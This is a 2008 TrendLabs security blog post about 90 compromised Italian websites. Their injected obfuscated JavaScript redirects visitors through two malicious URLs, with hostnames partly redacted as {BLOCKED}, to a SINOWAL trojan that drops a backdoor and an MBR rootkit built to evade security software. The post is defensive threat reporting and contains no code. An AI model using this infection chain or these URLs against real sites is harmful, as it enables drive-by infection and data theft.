Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
     1234
    567891011
    12131415161718
    19202122232425
    262728293031  
  • About Us

    In what may turn out to be an advanced one-year “toast” to the June 2007 mass infection that came to be known as the Italian Job, TrendLabs discovered 90 compromised Italian Web sites (all verified active as of this writing) at around 12:30 AM GMT. The compromised sites are varied; their only common thematic link seems to be the Italian language.

    According to Trend Micro analysts, the attack rolls out like this:

    1. The compromised Web sites contain obfuscated JavaScript code (detected as JS_AFIR.A) that redirects the browser to the malicious URL http://{BLOCKED}r.com/cgi-bin/index.cgi?grb&js=1.

    The script checks the Internet Explorer version and language so it will only execute on Italian ones.

    2. The said URL redirects to another URL: http://{BLOCKED}f.com/cgi-bin/index.cgi?grobin (blocked by Web Reputation Services since April 27).

    The two malicious sites were found to be hosted in a single IP traced back to San Diego, California.

    3. The said sites download TROJ_SINOWAL.CB (detected since April 26 GMT) from the same domain. TROJ_SINOWAL.CB then drops BKDR_SINOWAL.CF (detected since April 30 GMT), which in turn drops a rootkit component on the affected PC.

    This rootkit component modifies certain sectors of the infected hard disk. It also hooks Driver.sys to protect these sectors from read and write operations from AV/security software.

    See infection diagram below.

    SINOWAL malware variants are known information stealer droppers.

    As of this writing, TrendLabs has discovered two forms of this compromise: one is via an injected obfuscated script that redirects to a certain malicious URL, and the other is via a readable iFrame and the same obfuscated script.

    It appears that this attack affects sites hosted in Italy by a single hosting provider — the same one that hosted the thousands of sites (mostly travel and leisure) in last year’s large-scale infection. This time, compromised sites include the following:

    • The official site of Monica Bellucci (famous Italian model-actress)
    • The Mercedes-Benz club of Italy
    • The official Web page of Sabrina Salerno (Italian singer)
    • A Johnny Depp fan site
    • A fan site of Pearl Jam

    Here are screenshots of the first three sites mentioned above:

    monica

    benz

    sabrina

    Trend Micro customers are already protected from this threat. Web Threat Protection technology has prevented access to the malicious pages since 27 April 2008. The URLs have already been added to our emergency database and are blocked by WCS (Web Classify Server), making these accessible to customers. Also, the RootkitBuster tool is able to scan the MBR-rootkit component involved in this attack.

    Last updated at 5:27 PM GMT, 3 May 2008





    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon






     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice